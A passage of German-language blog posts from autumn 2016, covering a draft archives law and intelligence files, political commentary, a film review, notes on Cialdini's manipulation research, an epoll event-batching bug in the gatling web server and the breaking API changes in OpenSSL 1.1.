Das war, nachdem sie bei einem Mann im Auto Sprengstoff gefunden haben, dann eine Hausdurchsuchung gemacht haben, und da auch Sprengstoff gefunden haben. Oh und eine Auto-Verfolgungsjagd war auch dabei. (Danke, Johannes)

Tue Oct 11 2016

[l] Ich habe Gaby Weber mal zum Gaby-Weber-Gesetz befragt. Die Novelle könnt ihr übrigens hier als PDF einsehen.
Hier ist ihr Kommentar:
1. Es ist eine Unverschämtheit, dass die Novelle mit keinem Wort auf Unterlagen des Bundes eingeht, die in privaten Archiven liegen - mit oder ohne Zustimmung der Behörde. Das ist Gegenstand meiner Verfassungsklage, die derzeit in Karlsruhe liegt. Dazu hat das BMJ ein Gutachten gemacht, aber das Gericht weigert sich, es mir zu schicken. § 5 spricht lediglich von "Unterlagen, die bei ihnen vorhanden sind, in ihr Eigentum übergegangen sind oder ihnen zur Nutzung überlassen worden sind". Das ist der größte Skandal dieser Novelle. So verstecken sie ihre Akten vor uns!
2. Bei den Unterlagen von dritter Seite: Hier sollte für jedes Blatt, das weiterhin der Geheimhaltung unterliegen soll, eine eigene Begründung der ausgebenden Stelle vorliegen und eingefordert werden können. Bisher hast du in den Akten nur die Entnahmeblätter, wo das Aktenzeichen der fremden Behörde vorliegt. Das muss konkretisiert werden (und komplizierter werden, damit sie, um sich arbeit zu sparen, diese Blätter rausgeben)
3. Wenn der BND und co diese Akten nicht an das Bundesarchiv übergeben will, dann muss er einen Besucherdienst zur Verfügung stellen, um der Öffentlichkeit diese Akten zugänglich zu machen. In der Novelle muss der Satz drin stehen: "GRUNDSÄTZLICH SIND AUCH DIE UNTERLAGEN DER GEHEIMDIENSTE NACH 30 JAHREN ZUGÄNGLICH". Ein Sonderrecht darf es nicht geben.
Ich verstehe auch nicht, wieso Deutschland da einen Sonderweg gehen muss. Selbst anerkannte Triebtäter-Geheimdienste, vielfach für Mord und Totschlag verantwortlich, für Folter und Putsche, SELBST DIE öffnen ihre Akten nach soundsoviel Jahren ganz selbstverständlich für die Öffentlichkeit. Und da stehen dann so Dinger drin wie dass sie an einem "Heart Attack Gun" gearbeitet haben. Die US Army hat ihre "Gay Bomb" deklassifiziert, ohne dass die Welt unterging. Wenn die USA bei sowas hier die Geheimhaltung aufheben können, und Deutschland das Bekanntwerden der Nazi-Vernichtungslager überlebt hat, was haben denn dann bitte der BND und Verfassungsschutz für Verbrechen gegen die Menschheit begangen, dass das angeblich so schlimm ist, dass man das nicht veröffentlichen kann, weil sonst der Ruf Deutschlands Schaden nehmen könnte?!
"Ja, klar, die haben ein paar Millionen Juden vernichtet, aber das ist ja noch GAR NICHTS! Schau mal hier, was der BND neulich offenlegen musste!!1!"
Ich kann mir das gar nicht ausmalen, was da eigentlich der Gedankengang dahinter sein könnte.

Sun Oct 9 2016

[l] Ungarns führende linksliberale Zeitung hat überraschend zugemacht. Die Eigentümer-Holding sagt, die Zeitung habe halt Verluste gemacht und sei nicht wirtschaftlich, aber das glaubt ihnen in Ungarn niemand. 2000 Ungarn (immerhin) sind bei dem Schietwetter gerade auf die Straße gegangen, um dagegen zu protestieren.
[l] Ich muss mal ne Theorie mit euch teilen, die ich gerade entwickelt habe.
Es geht um die Frage, wieso wir von der Politik so offensichtlich für dumm verkauft werden. Früher war das besser, da haben sie uns noch ernst genug genommen, um uns eine zumindest oberflächlich plausible Lüge ins Gesicht zu lügen. Heute macht sich niemand mehr die Mühe.
Meine Theorie basiert auf der Beobachtung, dass Nigeria-Scammer ja auch strunzdämlich scammen, so abgrundtief schlechte Scams, dass da nur die dämlichsten der Dummen drauf reinfallen. Niemand mit mehr als zwei Hirnzellen würde auf so einen Amateur-Kack reinfallen. Und da stellte sich ja irgendwann raus, dass das mit Absicht so ist, weil das für die den Stress minimiert. Je schlauer ihre Opfer, desto mehr Anzeigen, Verfolgung, Rückbuchungen gibt es, desto mehr Nachfragen gibt es per E-Mail, von Leuten, die dann nicht dumm genug sind, sich überzeugen zu lassen. Daher zielen die ihre Scams absichtlich auf die größten Idioten unter den Vollpfosten.
Was, wenn das in der Politik genau so ist? Was, wenn die Politik ihre Nachricht auf die größten Vollidioten optimiert, und die bilden dann einen wütenden Partisanen-Mob, der Argumenten und rationalen Gedanken nicht zugänglich ist.
Und was ist mit den anderen? Die fühlen sich verwirrt und marginalisiert und alleine auf weiter Flur. So wie ihr jetzt in diesem Moment, liebe Leser. Dieser Mechanismus ist bekannt und wohldokumentiert. Der Mensch sehnt sich nach Gruppenzugehörigkeit. Irgendwann knickt ihr ein und schließt euch einem Mob an. Und solange haltet ihr euch für umzingelt von Idioten und muckt nicht auf.
Als die Politik gemerkt hat, dass die außerparlamentarische Opposition unfähig ist, größere Opposition nicht nur auf die Beine zu stellen, sondern in die Medien zu tragen, hatten die keinen Grund mehr, sich um euch zu kümmern. Ihr seid ein Problem, das sich von selbst löst.
Und die paar Mal, wo größere Demonstrationen zustande kamen, hat die Presse die schon von ganz alleine lächerlich gemacht oder in die Naziecke geschoben. Da musste die Politik gar nicht aktiv werden.
Was meint ihr zu der Theorie?

Sat Oct 8 2016

[l] Liebe Leser, die Deutsche Polizeigewerkschaft hat zum ersten Mal in ihrer Laufbahn eine Einsicht gewonnen. Diesen Moment sollten wir feiern.
Und zwar hatten sie eine geschmacklose Umfrage gepostet, an wem man mal die Taser testen solle, und dann ein paar Politikernamen. Haha, *schenkelklopf* zum Brüllen komisch, liebe Polizeigewerkschaft!1!! Nun fanden das wenig überraschend die erwähnten Politiker nicht so lustig, da als potentielles Folterziel gehandelt zu werden. Also hat die DPolG diese Umfrage wieder weggemacht. Begründung:
Der Eindruck, dass #Taser ein Folterinstrument sein kann, ist falsch.
Ach soooo! Es ging hier um den Schutz des guten Rufs von Taser! Nicht etwa darum, dass die DPolG mit Anlauf ins Klo gegriffen hat!
Und hey, gegen Politiker ist nicht gut, Taser setzt man gegen Ausländer ein, das weiß doch jeder!1!!
Aber bei aller Häme. Dass sie zu der Transferleistung fähig waren, dass sie gerade Taser als Folterwerkzeug bewerben, das muss man ihnen anrechnen. Ich kann mich an keinen anderen Fall erinnern, wo man der DPolG beim Denken zuschauen konnte, und sie haben tatsächlich eine Erkenntnis gewonnen. In diesem Sinne: Bravo, liebe DPolG! Weitermachen! Vielleicht merkt ihr ja eines Tages auch, dass Folterwerkzeuge von Folterknechten bedient werden und Folter verboten ist!
[l] Oh, unsere Junta arbeitet an einem Lex Gaby Weber! Glaubt ihr nicht? Na dann guckt mal:
Das Gesetz regelt, dass amtliche Informationen im Bundesarchiv erst dann eingesehen werden können, wenn eine Schutzfrist von dreißig Jahren abgelaufen ist. Das galt jedoch bisher nicht für Unterlagen, die bereits nach dem Informationsfreiheitsgesetz (IFG) prinzipiell offenstanden.
Wie jetzt? Aber das ist ja noch kein Grund, das Gesetz nach Gaby Weber zu benennen. Das hier ist der Grund:
Nach dem neuen Entwurf sollen Akten von Verfassungsschutz, Bundesnachrichtendienst (BND) und Co. nur noch dann dem Archiv angeboten werden, wenn die Dienste selbst keine „überwiegende[n] Gründe des Nachrichtenzugangs“ sehen. Danach könnte etwa der BND selbst entscheiden, ob er eigene Dokumente auch nach Jahrzehnten noch schutzwürdig findet – eine Regelung, die er zur extensiven Geheimhaltung ausnutzen könnte.
Öh, … und wieso machen sie das jetzt? Na wegen Gaby Weber!
In den letzten Jahren musste der BND unter anderem Unterlagen zu Adolf Eichmann herausgeben, die zeigen, dass die Vorgängerorganisation des BND fünf Jahre vor dem Mossad bereits Kenntnis vom Aufenthaltsort von Adolf Eichmann hatte. Nach der Gesetzesnovelle könnten solche Akten weiter im Giftschrank lagern.
Ja super!!
Update: Ein Leser dementiert:
die erste Behauptung, dass Akten die nach IFG schon benutzbar waren nun nicht mehr benutzbar sind, ist falsch. Im neuen BArchG werden in §11 Absatz 5 die Schutzfristen außer Kraft gesetzt, wenn die Akten schon nach IFG benutzt wurden.
Die Schutzfristen der Absätze 1 bis 3 sind nicht auf Archivgut des Bundes anzuwenden,
1. das aus Unterlagen besteht, die bereits bei ihrer Entstehung zur Veröffentlichung bestimmt waren, oder
2. soweit es aus Unterlagen besteht, die vor der Übergabe an das Bundesarchiv nach einem Informationszugangsgesetz zugänglich gemacht worden sind.
Das Gegenteil ist eigentlich der Fall, früher gab es das Paradoxon das offene Akten wieder eine Schutzfrist bekamen wenn sie Archivgut des Bundes wurden. Dies wurde aber auch schon im derzeit gültigen Archivgesetz geändert.

Wed Oct 5 2016

[l] Kennt ihr das, wenn ihr euch ein Stück Code anschaut, und dann seht ihr da ein Problem?
Ihr denkt euch: Hey, das hätte doch nie funktionieren dürfen?
Und dann, ab der Sekunde, hört es auch tatsächlich zu funktionieren auf?
Das passiert mir häufiger. Bisher fand ich das immer ganz lustig, aber wenn es meinen Webserver betrifft, dann ist das schon unschön.
gatling basiert auf libowfat, das abstrahiert das Event-Polling-Interface weg. In meinem Fall auf blog.fefe.de ist es epoll, das wegabstrahiert wird. Früher hatten wir poll() und select() für Netzwerk-Events unter Unix, und das war Scheiße. Der Kernel und das Userland mussten pro Iteration durch alle beobachteten Deskriptoren durchgehen und alle einmal angucken. Völlig sinnlose Verschwendung von CPU-Zeit und RAM-Bandbreite, denn normalerweise hat man als Webserver sowas wie 1000 Verbindungen offen (je nach dem, was für Timeouts man da eingestellt hat), und davon ist auf drei oder vier was los.
Die nächste Iteration von Event-API hieß SIGIO, und da hat man dann das Ansagen, an welchen Deskriptoren und Event-Arten man interessiert ist, und das Rückmelden der tatsächlich eingetretenen Events voneinander getrennt. Leider konnte SIGIO jeweils nur ein Event zur Zeit zurückliefern. Das sah damals wie ein krasser Nachteil aus, wie eine Ineffizienz. Syscalls sind nicht kostenlos, also will man pro Syscall die Arbeit maximieren. Daher war der nächste Ansatz, epoll, so, dass wieder Anmelden und Abholen getrennt war, aber das Abholen geht in Gruppen, d.h. da kriegt man sowas wie 100 Events auf einmal. Das ist deutlich effizienter, also mache ich das natürlich so.
Nun unterhalte ich mich mit meinem Kumpel Erdgeist seit längerem darüber, wie wir libowfat mal ordentlich multithreading-fähig kriegen. Der Punkt dabei ist, dass das aktuelle Programmiermodell von libowfat single-threaded ist, und das ist nicht bloß ein Problem mit Locking und Datenstrukturen. Das Problem ist folgendes.
Nehmen wir mal an, man arbeitet auf zwei Sockets zur Zeit, die zusammengehören. Bei gatling kommt das zum Beispiel für Proxy- oder CGI vor, d.h. beim Blog. Ein Socket geht zum Webbrowser des Users, ein Deskriptor geht zum CGI von dem Blog. Die gehören jetzt zusammen. Schließe ich einen, schließe ich auch den anderen.
Nehmen wir jetzt mal an, wir haben die internen Datenstrukturen soweit multithreading-fähig gemacht, und es liegen zwei Events an, einer bei dem Socket zum Webbrowser und einer beim Socket zum CGI. Aber die landen bei verschiedenen Threads. Dann kommen sich die Threads möglicherweise ins Gehege. Die Strategie für effizientes Multithreading ist, dass man die Daten so weit wie möglich trennt. Am effizientesten ist "shared nothing". Daher ist mein Ansatz, dass ich sage: Das lohnt sich erst, wenn der Thread, der einen Socket bearbeitet, da nicht groß rumlocken muss. Aber selbst wenn wir sagen, der lockt herum, dann ist das immer noch nicht trivial. Die Sockets sind ja gleichberechtigt. Wenn als Thread 1 den 1. lockt und dann den anderen, und Thread 2 lockt seinen 1. (den 2. aus Sicht des 1. Threads) und dann den anderen, dann gibt es einen Deadlock. Am liebsten will man also, dass die Anwendung nichts mehr locken muss.
Nun fiel mir vor zwei Tagen auf, dass durch dieses Event-Batch-Verfahren das ja auch passieren kann, dass du ein Event für beide Sockets reinkriegst. Das Event auf dem 1. Socket ist sagen wir mal "Connection reset by peer", du rufst auf beide Deskriptoren ein close() auf, … und an der Stelle schmeißt der Kernel weitere, noch herumliegende Events für den Deskriptor weg und meldet die nicht mehr. Alles gut? Nein! Denn wir haben ja 100 Events auf einmal abgeholt. Wir haben also potentiell noch ein Event für den Deskriptor in der Tasche, den wir gerade geschlossen haben!
OK, denkt ihr euch jetzt vielleicht, aber den habe ich ja geschlossen. Wenn das Event ankommt und ich mache ein read() auf den Deskriptor, gibt es sofort eine Fehlermeldung von read() und alles ist gut. Das ist halt gerade nicht so klar. Nehmen wir mal an, in der Mitte ist noch ein anderes Event, für das öffnen wir beispielsweise eine Datei oder einen Proxy-Socket oder ein CGI. Der Kernel wird dann versuchen, den kleinstmöglichen Zahlenwert für den Deskriptor zu liefern, und der kleinste freie Deskriptor ist der, den wir gerade geschlossen haben. D.h. wenn das Event für den 2. Socket reinkommt, ist der Deskriptor schon für was anderes belegt, und es passieren eben merkwürdige Dinge.
Wir guckten uns virtuell an, und Erdgeist meinte nur so: Wenn jemand close macht, schmeißst du die Events aber schon weg, die da noch rumgammeln?
Nein, tat ich nicht. An die Möglichkeit hatte ich nicht gedacht. Darauf war meine Datenstruktur auch nicht ausgelegt, dass man aus der Mitte der Queue was löschen wollen würde. Ich könnte da jetzt immer irgendwelche Warteschleifen durchlaufen, aber die Datenstrukturen waren ja absichtlich so ausgelegt, dass alle Zugriffe O(1) sein sollten. Nix iterieren.
Also ist die bessere Lösung, da nichts zu löschen, sondern wenn jemand close auf einen Deskriptor macht, und ich habe noch ein Event für den in der Queue (das kann ich ohne Iterieren sehen), dann verzögere ich das tatsächliche Schließen des Deskriptors, bis alle Events abgearbeitet sind. Das hat natürlich auch Nachteile, denn jetzt gibt es mehr System-Last bei der Anzahl der offenen Deskriptoren. Es gammeln ja immer ein paar noch rum, die eigentlich schon geschlossen sein sollten. Ist also auch keine schöne Lösung, aber scheint gerade erstmal zu tun. Ich mache jetzt gleich einen Mike Drop für heute und guck morgen nachmittag nochmal vorbei, ob noch alles läuft. Wenn nicht, dann wisst ihr ja :-)
Oh, Auto-Abschuss und Auto-Neustart gibt es bei mir nicht. Meine Philosophie ist, dass man Fehler sofort brachial merken und hocheskalieren muss, nicht verstecken oder verbergen, sonst gibt es nie genug Leidensdruck, die schnell zu fixen.

Tue Oct 4 2016

[l] Hmm, das Blog war gerade offline, die Fehlermeldung war "too many open files". Ich habe neulich in gatling ein bisschen die Architektur umgebaut, um Syscalls zu sparen. Ich nehme an, dass ich dabei was kaputt gemacht habe und irgendwo Deskriptoren leaken können. Ich werde das mal beobachten, ob ich das Problem finden kann.

Mon Oct 3 2016

[l] Ich habe neulich Ghostbusters geguckt, und ich glaube, ich verstehe jetzt, wieso der bei einigen Leuten so schlecht ankam. Vorweg: Ich fand den Film auch schlecht. Ich konnte da während des Films nicht so recht den Finger in die Wunde legen, weil die Sachen, die mir da auffielen, alle so Kleinigkeiten waren, die man auch getrost wegignorieren könnte.
Zum Beispiel dreht der Film ein typisches sexistisches Trope um und macht nicht nur die drei Protagonisten weiblich, sondern gibt ihnen auch noch eine gutaussehende männliche Sekretärin, gespielt von Thor-Darsteller Chris Hemsworth, und in jeder einzelnen Szene mit ihm wird mehr oder weniger nachdrücklich der Running Gag reingedrückt, dass er besonders dämlich ist, aber sie ihn trotzdem eingestellt haben, weil er halt gut aussieht. Das hat mich während des Films ein bisschen gestört, weil die das in wirklich jeder einzelnen Szene reingedrückt haben, und weil diese Szenen wie eine Satire überspielt sind. Das passte für mich irgendwie nicht zusammen. Entweder dir ist es ernst um die Problematik, dann zeigst du es wie es ist. Oder du machst eine Satire, aber was ist dann eigentlich das Objekt der Satire? Was wird hier karrikiert?
Kleiner Punkt. Eigentlich irrelevant. Jedenfalls für sich genommen kein Grund, den ganzen Film nicht gut zu finden.
Dann war da die Rollenverteilung, die mich störte. In den alten Ghostbusters gab es einen harmlosen Nerd, Egon Spengler, der die Handlung nicht groß vorantreibt, aber der herzensgut ist und dem auch nichts schlimmes zustößt. Er ist für die wilden Theorien und Ideen zuständig, und baut die coolen unerklärten Geräte. Dann gibt es einen Con-Man, Peter Venkman, der immer nur an sich denkt und dafür im Film ständig von seinem schlechten Karma heimgesucht wird. Er ist für die offensichtlichen Ideen zuständig, die dann was werden, damit der Film unterm Strich nicht zu einem Nerdfest verkommt. Zu guter Letzt gibt es noch den 2. Nerd, Ray Stantz, der aber nichts sinnvolles wissenschaftlich beiträgt, außer irgendwelche sinnlosen Kategorisierungen vorzutragen. In dem neuen Film gibt es einen echten Nerd, gespielt von Kristen Wiig, deren Uni-Karriere durch den Geister-Unfug ruiniert wird. Sie ist aber in dem Film für keine Einsichten zuständig. Alle Erfindungen und Geräte kommen von der Ingenieurin Holtzmann, gespielt von Kate McKinnon, und dann gibte s noch Abby Yates, gespielt von Melissa McCarthy, die … ja was macht die eigentlich in dem Film? Comic Relief? Die Rollenverteilung ergibt keinen Sinn im neuen Film. Wir haben drei Hauptdarstellerinnen, die alle versuchen, die komische Hauptdarstellerin zu spielen. Eingeschleimt vom grünen Glibber-Geist werden aber nicht die mit dem schlechten Karma sondern die Nerdin, die eh gerade ihre Karriere verloren hat. Das ergibt alles keinen Sinn.
Kommen wir zu den drei Hauptdarstellerinnen. Melissa McCarthy, Kristen Wiig, Kate McKinnon. Später kommt noch Leslie Jones dazu. Melissa McCarthy kannte ich aus The Heat mit Sandra Bullock, was eine low-brow Kommödie war mit lauter billigen Lachern, aber ich habe mich bei dem Film prima amüsiert und habe mir ihren Namen gemerkt, und den des Regisseurs, Paul Feig. Der ist auch der Regisseur von Ghostbusters. Was lief also gegenüber The Heat schief? Beide Filme hatten keine überbordenden Anspruch, dem sie dann nicht gerecht werden konnten. Beide Filme haben halt eine Reihe von Jokes abgezogen, einige von denen auch halbwegs lustig. Wieso hat The Heat funktioniert aber Ghostbusters nicht?
Meine Theorie: Weil bei Ghostbusters lauter Leute von Saturday Night Live mitgespielt haben. Wer das noch nie gesehen hat, sollte sich das mal kurz angucken. Das ist so Holzhammer-"Satire" mit Lachern vom Tape (angeblich nicht Tape sondern Live-Publikum). Ganz, ganz furchtbar. Brutalstes Overacting, alle Emotionen mit Vorschlaghammer-Mimik und Gestik, überhaupt keine Subtilität. Vielleicht können die was, schauspielerisch, aber davon war in dem Film nichts zu sehen (fand ich). Die haben das halt gespielt wie einen langen SNL-Sketch. Alle fünf Sekunden muss es ein HAHA-Schenkelklopfer-Moment geben, sonst haben wir unseren Job nicht gut gemacht. Und das schlug sich bis ins Drehbuch nieder. SNL guckt man ja auch nicht für die Charakterentwicklung der Protagonisten.

Sun Oct 2 2016

[l] Die FAZ hat ein Doppelinterview mit Sahra Wagenknecht und Frauke Petry gemacht, und dabei sind wohl mehr oder weniger überraschend einige politische Übereinstimmungen aufgefallen.

Sat Sep 24 2016

[l] Seit ein paar Monaten blubbert ja in den USA ein Streit darüber, ob die 9/11-Opfer Saudi Arabien verklagen können sollten oder nicht. Im Moment geht das nicht, aber weil 9/11 so eine Trigger-Phrase ist, der sich kein Politiker entziehen kann, hat das Parlament mit überwältigender Mehrheit ein Gesetz gemacht, das das erlauben würde.
Das ist natürlich eine sehr, sehr schlechte Idee, so ein Gesetz. Erstens einmal ist das ja keine Justiz, wenn ein Richter in Land A Land B verklagt. Ein Gericht muss neutral sein. Das wäre eher ein Schauprozess als Gerechtigkeit. Außerdem spräche dann nichts mehr dagegen, dass andere Länder das selbe mit den USA machen, und, sagen wir mal, den Botschafter einlochen und Milliardenstrafen verhängen. Ich denke hier beispielsweise an Venezuela und andere Länder in Südamerika, die seit vielen Jahren überzeugt sind, dass die USA ihnen massive Schäden zufügen bis hin zu Putschversuchen. Wenn die jetzt alle sagen, hey, wir frieren mal alle Assets von US-Konzernen ein, dann wäre aber ganz schnell Ende mit Ölförderung und Chiquita und so.
Daher hat Obama ein Veto eingelegt. Das Parlament will das jetzt überstimmen.
Da weiß man auch gar nicht, auf wessen Seite man sein soll. Popcorn!
Die Wurzel des Problem ist natürlich, dass die USA den Internationalen Strafgerichtshof, der ja eigentlich für sowas zuständig wäre, nicht anrufen können, weil sie ihn nicht anerkennen wollen. Auch aus Angst, dass sie dann sofort abgeurteilt werden.

Mon Sep 19 2016

[l] Ich lese immer noch in dem Cialdini herum. Fast jede Seite eine neue Erkenntnis. Ich brauche da echt alle paar Seiten eine Pause zum Nachdenken.
Gerade geht es darum, dass man die Wichtigkeit einer Sache massiv übersteuern kann, indem man die Aufmerksamkeit von Leuten auf sie lenkt. In den Augen dessen, den man dazu bringt, sich auf die Sache zu fokussieren, ist sie viel wichtiger als sie es verdienen würde. Und das ist natürlich auch ein tolles Manipulationswerkzeug.
Als Beispiel hat er den Irakkrieg und die "embedded Journalists". Dadurch, dass diese Journalisten ein beschränktes Blickfeld hatten, und praktisch ausschließlich aus dem operativen Kriegsgeschäft berichtet haben (also was für Equipment haben die Soldaten, kriegen die genug zu essen, ist ihr Informationsstand OK, wie heiß ist es da, kann man da ein Carepaket hinschicken, …), gab es so gut wie keine Berichterstattung über das große Bild. Es ging immer über das Wie, Wo, Wer, gegen Wen, aber nie um das Warum. Es gibt wohl keine Belege dafür, dass das so geplant war. Die Militärs haben sich gedacht, dass sie so Informationskrieg führen können, und die einheimischen Medien davon abhalten können, Dinge (also Lügen der Gegenseite jetzt) zu glauben, die eingebetteten Reporter anders erlebt haben. Aber rückblickend war das der mächtigere Effekt der Einbettung.
Ich möchte die Gelegenheit nutzen, mal anzusagen, dass ich grundsätzlich keine Produktbewertungen auf Webseiten abgebe. Ich erwähne das, weil das in dem Buch ein weiteres Beispiel für Manipulation ist. Er meint damit so "Waren Sie mit unserem Service zufrieden?"-Dinger. Die fokussieren die Aufmerksamkeit des Befragten auf die positiven Aspekte dieses Anbieters und blenden dabei die positiven Aspekte anderer Anbieter komplett aus. Das ist keine harmlose "wir wollen besser werden"-Sache, das ist knallharte Manipulation.
Zu der Einsicht bin ich schon bei der Lektüre von Kahnemann gekommen, der den Effekt besprochen hat, dass man sich festlegt. Wenn ich hinschreibe, dass ich Produkt XY gut fand, dann lege ich mich auch für die Zukunft auf dieses Produkt fest. Selbst wenn ich das mit betrügerischer Intention hingeschrieben habe, um sagen wir mal 100 Bonusmeilen oder 20 Internetpunkte zu erlangen. Das ist ein messbarer psychologischer Effekt. Das alleine finde ich sogar noch krasser als die Fokus-Hypothese von Cialdini.
Aber was ich eigentlich sagen wollte: Schon bevor ich Kahnemann gelesen habe, habe ich sowas nicht gemacht. Weil ich Datenschützer bin und Datensparsamkeit für wichtig halte. Und weil solche Sites normalerweise wollen, dass man einen Account einrichtet, oder anderweitig rückverfolgen können, wer da was gestimmt hat.
Der Datenschutz hat mich also vor fiesen Psycho-Manipulationen geschützt. Das ist auch ne Sache, die ich so nicht kommen sah.
Ich bin noch nicht mal bei der Hälfte des Buches, aber soviel ist jetzt schon klar: Nie an Umfragen oder Produktbewertungen teilnehmen.

Fri Sep 16 2016

[l] Ich bin jetzt ein paar Seiten weiter in dem Cialdini-Buch und da beschreibt er genau den Spruch, den die Drückerkolonnen anwenden. Er beschreibt ein Experiment, in dem ein paar Forscher eine Umfrage in einem Einkaufszentrum machen wollten. Nur 29% der Angesprochenen wollten mitmachen.
Dann haben sie die Leute erst das hier gefragt:
Do you consider yourself a helpful person?
Darauf haben natürlich fast alle mit ja geantwortet. Und plötzlich haben dann 77.3% bei der Umfrage mitgemacht.
Die Wirkung von solchen Manipulationen ist also bemerkenswert stark.

Sun Sep 11 2016

[l] Krass: In North Dakota ist ein Haftbefehl auf Amy Goodman ausgestellt worden. Das ist die Produzentin von Democracy Now, eine sehr bekannte Journalistin und geradezu eine Institution. Sie hatte vor Ort über Proteste gegen einen Pipelinebau berichtet. Ihr wird "criminal trespassing" vorgeworfen, das ist wohl das US-Äquivalent von "Schwerer Landfriedensbruch" und hüben wie drüben der Standard-Bullshit-Vorwurf des Unterdrückungsstaates gegen unbescholtene Bürger. Denn wenn sie irgendwas gemacht hätten, das man ihnen vorwerfen könnte, würde man sie wegen Widerstandes gegen die Staatsgewalt oder Körperverletzung oder so zu belangen versuchen.

Thu Sep 8 2016

[l] Wells Fargo schmeißt 5300 Mitarbeiter raus. Wie? Nein, nicht wegen "der Krise" oder zum Sparen. Die haben zusammen insgesamt 2 Millionen Fake-Accounts aufgemacht. Um Kommission zu kassieren.
Wenn ich das richtig verstehe, dann nicht auf ihren oder Fake-Namen, sondern auf Namen und Rechnung existierender Kunden, also sowas wie Unterkonten eingerichtet.
Also ich finde ja, DAMIT konnte NIEMAND rechnen, dass es unter Bankstern genug kriminelle Energie für sowas gibt. Oder dass finanzielle Anreize zu Bescheißen führen.

Sat Sep 3 2016

[l] Zur Hanjin-Pleite kommt hier dieser weiterhelfende Kommentar rein:
Es ist nicht die Entscheidung der Häfen, die Schiffe nicht reinzulassen, sondern die von Hanjin, derzeit keinen Hafen anzulaufen. Die sind halt pleite, aber wenn sie die Schiffe in einen Hafen bringen, können die dort arrestiert werden (i.e. gepfändet). Wenn das in einigem Umfang passiert, womöglich mit Containern an Bord, ist der Laden nicht nur pleite sondern auch noch nicht mehr sanierungsfähig, weil nichts mehr geht. Die Schiffe verursachen ja weiter Kosten in erheblicher Höhe, Ladung verdirbt oder verliert an Wert oder wird irgendwo dringend gebraucht (ein paar Tonnen nagelneue Telefone an Bord?)
Stattdessen besorgen die sich jetzt in Korea das dortige Äquivalent einer injunction (Unterlassungsverfügung) und damit darf niemand mehr in deren Eigentum reinpfänden. Wer es doch macht, kann in Korea verklagt und belangt werden. Weil es vielen Leuten egal sein wird, wenn sie sich in Korea was zuschulden kommen lassen würden, geht Hanjin anschliessend mit der Injunction in die USA und meldet dort Insolvenz nach Chapter 15 an. Damit bekommt das koreanische Insolvenzverhalten und das Verbot, Sachen von Hanjin zu pfaenden, weltweite Geltung. Dem US-Rechtssystem sei Dank. Gegen US-Recht zu verstossen überlegen sich eine ganze Menge deutlich besser und länger. Und lassen es am Ende sein.
Das ganze dauert ein paar Tage, insbesondere, weil jetzt Wochenende ist, aber Anfang nächster Woche werden die Schiffe weiterfahren. Niemand ist gestrandet.
Eigentlich im Gegenteil, wenn so ein Dampfer jetzt irgendwo in einem indischen, indonesischen, afrikanischen, … Hafen arrestiert wird, dann sind unter Umständen die Leute wirklich gestrandet. Dann ist erstmal rechtlicher Limbo, Dinge dauern lange, Sprachbarriere mit dem Richter, alle halten die Hand auf … Alptraum.
Kurz, bislang sieht es so aus, als wuerde diese Pleite professionell gemanaged.

Mon Aug 29 2016

[l] HAARP macht einen Tag der offenen Tür, um Verschwörungstheoretiker davon zu überzeugen, dass sie keine orbitalen Gehirnwäschelaser betreiben.
Währenddessen: Der BND veranstaltet einen Tag der geschlossenen Tür, um Verschwörungstheoretiker davon zu überzeugen, dass sie fiese Dinge im Keller tun. Der Berliner Kurier hat Fotos gemacht. Naja. Zwei Fotos. Nicht sonderlich weiterhelfende :-)

Sat Aug 27 2016

[l] Ich habe hier vorhin mal OpenSSL auf 1.1 updaten wollen, und das zerschießt einmal die gesamte Infrastruktur. Also so einmal alles. Die haben diverse interne Typen opak gemacht, und die ganze Software da draußen greift halt hemmungslos auf diese internen Datenstrukturen zu. Und man ist ja auch immer wieder überrascht, wie viel Software so gegen OpenSSL linkt.
Die Shared Library hat eine neue Version, d.h. man muss einmal alle Software neu bauen. wget, curl, alles. curl baut gegen das neue OpenSSL, aber ist damit allein auf weiter Flur. wget musste ich patchen, mutt musste ich patchen, neon (für Subversion) musste ich patchen. git war gut. Der SSL-Code aus gatling geht überraschenderweise auch ohne Änderung. Aber sonst so? Kahlschlag.
Python baut zum Beispiel nur die Module _hashlib und _ssl nicht mit. Ihr könnt euch ja ausmalen, was das alleine an Folge-Infrastrukturapokalypse nach sich zieht. Bei mir konkret geht daher gerade SCons nicht, welches das Buildsystem von serf ist, ohne das ich Subversion nicht reparieren kann.
Die Perl-Module gingen auch. Aber so gefühlt ist über die Hälfte der Software jetzt zerbrochen.
Ich hätte mir ehrlich gesagt erhofft, dass die OpenSSL-Leute da eine klitzekleine Warnung in ihren Bart säuseln, bevor sie so eine Apokalypse lostreten.
Auf der anderen Seite ist das ja auch ein schöner Impuls, mal generell von diesem OpenSSL wegzumigrieren.
Update: Bei Debian hat es auch das eine oder andere Paket zerrissen.
Update: Ein Leserbrief dazu:
Wollte nur kurz darauf hinweisen, daß die API-Änderungen bei OpenSSL 1.1 nicht nur jede Menge inkompatibilitäten nach sich ziehen, bei denen was laut kaputt geht (compiletime error), sondern auch API-Änderungen dabei sind, die stillschweigend security-buigs erzeugen können.
Beispiel: Die HMAC manpage sagt:
```
   HMAC_Init_ex() initializes or reuses a HMAC_CTX structure to use the
   function evp_md and key key. Either can be NULL, in which case the
   existing one will be reused.
```
HMAC_Init_ex liefert erst seit kurzem einen Fehlerstatus zurück - früher hatte sie keinen Rückgabewert und konnte nicht fehlschlagen. Daher testet auch ne Menge Software nicht auf sowas, und das wra bis vor kurzem auch korrekt.
In OpenSSL 1.1 gibt es aber folgende Änderung:
```
    /* If we are changing MD then we must have a key */
    if (md != NULL && md != ctx->md && (key == NULL || len < 0))
        return 0;
```
d.h. anders als dokumentiert, kann nicht "either NULL" sein. Aber alte Software kann das nicht prüfen, und welche HMAC dann im Endeffekt berechnet wird, steht in den Sternen.
Die Reaktion von OpenSSL upstream war, die Doku zu ändern.
D.h. nicht nur breaked openssl die API (teilweise unnötig) so, daß Programme nicht mehr kompilieren, nein Programme, die mal korrekt waren und jetzt immer noch kompilieren haben jetzt unter Umständen größere Sicherheitslöcher.
(Es gibt eine Reihe ähnlicher stiller API-Änderungen in OpenSSL 1.1)
(und ja, wegmigrieren hört sich gut an, aber es gibt häufig keine alternative mit gleichen Funktionsumfang ohne diese Probleme - gnutls hat z.b. mindestens bis vor kurzem kein RSA-OEAP padding unterstützt, sondern nur das extrem anfällige kaputte PKCS-padding).
Und zu meiner Aussage, dass interne Typen opak gemacht wurden, kommentiert der Einsender noch:
